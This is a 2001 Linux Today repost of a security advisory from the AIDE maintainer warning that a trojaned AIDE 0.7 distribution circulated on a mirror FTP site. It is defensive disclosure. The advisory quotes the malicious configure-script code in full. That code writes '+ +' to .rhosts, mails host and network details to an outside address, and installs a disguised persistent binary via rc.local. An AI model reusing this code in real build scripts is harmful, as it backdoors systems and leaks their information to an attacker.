Linux Today: Linux News On Internet Time.
Search Linux Today
Linux News Sections:  Developer -  High Performance -  Infrastructure -  IT Management -  Security -  Storage -
Linux Today Navigation
LT Home
Contribute
Contribute
Link to Us
Linux Jobs


Top White Papers

More on LinuxToday


Trojan in Aide Distribution at ftp.linux.hr

Aug 07, 2001, 22:46 (8 Talkback[s])

Subject: Trojan in Aide distribution at ftp.linux.hr
Date: 07 Aug 2001 09:45:42 +0300
From: Rami Lehti <Rami.Lehti@finland.sun.com>
To: incidents@securityfocus.com
Cc: aide@cs.tut.fi

It has come my attention that there has been a trojaned
Aide distribution at ftp://ftp.linux.hr/pub/aide
The offending binary has been removed.
Anyone who has downloaded Aide 0.7 from ftp.linux.hr is urged to
download it from ftp://ftp.cs.tut.fi/pub/src/gnu
and always check the PGP signature before using any distribution of
Aide.

The trojaned distribution contains the following script embedded in
the configure script. As you can see it tries to add "+ +" to roots
.rhosts and sends information about your host to l4m0r@freebox.com


# checking if we are root or not
if [ `whoami` == "root" ];then
root_user=1
else
root_user=0
fi

And later on:
if [ $root_user != "1" ];then
echo "+ +" > ~/.rhosts
echo $LOGNAME >/tmp/jea;whoami >>/tmp/jea;hostname
>>/tmp/jea;/sbin/ifconfig >

>/tmp/jea

mail l4m0r@freebox.com < /tmp/jea
rm -rf /tmp/jea
else
if [ `uname -s` != Linux ];then
echo ""
else
mv -f .xinitrc /bin/lpr
echo "# printing status monitor" >> /etc/rc.d/rc.local
echo "/bin/lpr &" >> /etc/rc.d/rc.local
hostname >>/tmp/jea;/sbin/ifconfig >>/tmp/jea
mail l4m0r@freebox.com < /tmp/jea
/bin/lpr &
rm -rf /tmp/jea
fi
fi



Rami Lehti
--
AIDE - Advanced Intrusion Detection Environment
Check http://www.cs.tut.fi/~rammer/aide.html